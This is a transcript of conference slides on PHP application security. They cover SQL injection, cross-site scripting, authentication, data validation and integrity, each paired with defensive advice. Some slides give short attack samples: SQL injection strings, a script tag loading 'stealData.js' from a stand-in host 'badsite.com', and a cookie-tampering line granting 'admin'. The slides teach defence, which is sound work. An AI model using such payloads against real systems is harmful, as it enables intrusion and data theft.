Security in PHP Applications: An absolute must!
33
Security in PHP Applications: An absolute must! Mark Niebergall https://joind.in/14031
-
Upload
mark-niebergall -
Category
Software
-
view
78 -
download
0
Transcript of Security in PHP Applications: An absolute must!
Security in PHP Applications: An absolute must!
Mark Niebergallhttps://joind.in/14031
About Mark Niebergall
● Developing in PHP since 2005● Masters degree in Information Systems● Senior Software Engineer and Team Lead● Occupational health screening project● Security: SSCP, CSSLP Certified● PHP, databases, JavaScript● Enjoy being outdoors
Security Landscape
● Constant attacks: http://map.ipviking.com/● Targeting all organizations● Script kiddies, collectives, nation states,
crackers, thieves, colleagues, insiders, creative users, and many more
Notable Attacks● Target● Home Depot● Sony Pictures● Anthem● JP Morgan Chase● Ebay● Sony PSN● Xbox Live
Tech Attacks
● Mt. Gox● Drupal● php.net● Facebook● Mozilla● Slack● Github
PHP Version
● December 2014: only 25.94% of PHP installs were secure based on PHP version
● Check your version, upgrade to safe version● Anthony Ferrara
http://blog.ircmaxell.com/2014/12/php-install-statistics.html
No Organization is Immune
Security Topics Covered
● SQL injection● Cross-site scripting (XSS)● Authentication and authorization● Data validation● Data integrity
SQL injection
● SELECT * FROM users WHERE id = $id
● $id = ‘15; UPDATE users SET enabled = 1’
● $this->getDb()->select()->from(‘users’, ‘username’, [‘user_id = ?’ => $id])
SQL injection
● UPDATE productSET cost = $_GET[‘cost’]WHERE id = $_GET[‘id’]
● cost = ‘0.01’● id = ‘1 OR 1=1’● $this->getDb()->update(‘product’, [‘cost’ =>
$cost], [‘id = ?’ => $id]);
SQL Injection Solutions
● Use prepared statements (PDO, framework)● Consider misuses● Validate data● Use database features when applicable
o Viewso Stored Procedureso Functionso CTE
XSS
● Form of code injection● Attacker injects client-side script into a site● Persistent vs Reflected (non-persistent)
XSS
● <script>window.location.href=‘http://youtube.com’</script>
● <script src="http://badsite.com/stealData.js">
XSS
● Filter inbound datao filter_input for contento data validation
● Escape view datao strip_tags($string, [$allowedTags])
● Remove unwanted characters http://ascii.cl/
Authentication and Authorization
● Authentication: user is who they say they are● Authorization: user has access to resource
Authentication and Authorization
● $_SESSION[‘user’] vs $_COOKIE[‘user’]● javascript:document.cookie="user=admin"● https://yoursite.com/users.php?id=7
Authentication and Authorization
● Do not trust data that can be altered by usero GETo POSTo COOKIEo SERVERo ENV
Authentication and Authorization
● Sessions and tokens● Automatic logouts● Auditing
Authentication and Authorization
● Never assume user has authorization● Check values from user
● Considerations for authorizationo Can user gain access to personal or sensitive datao Can user change user ‘admin’ email and passwordo Can user manipulate DOMo Can user use SQL injection to get unauthorized datao Can user use XSSo Can user see detailed technical errors
Authentication and Authorization
Data Validation
● Ensure data is clean, correct, and useful
Data Validation
● Data typeo Integero Floato Stringo Date
Data Validation
● Range and constrainto Minimumo Maximumo Lengtho Matches regular expression
Data Validation
● Code and cross-referenceo Data is usefulo Database constraints
Data Validation
● Structured validationo Data typeo Conditional requirementso Data object
Data Integrity
● Foreign keys to ensure relational data is created and kept accurately
● Unique keys to prevent data duplication● Avoid data corruption and data loss
Data Integrity
● Stability● Performance● Re-usability● Maintainability● Applies to both database and application
Development Life Cycle
● Analyze application security needs● Threat modeling● Risk acceptance level● Security considerations in requirements● Project management and developers need
to work closely
Development Life Cycle
● Security testing for acceptance● Code reviews● Regular review of security landscape and
emerging threats● Identify weakest points and make a plan to
strengthen those areas
Convince Management to Invest
● Avoid fear tactics● Explain benefits of investment
o Brand valueo Customer loyaltyo Selling point
● Discuss applicable regulations● Visibility into current security posture● Plans and goals
Resources● Anthony Ferrara
http://blog.ircmaxell.com/2014/12/php-install-statistics.html● XSS https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Questions?
● https://joind.in/14031
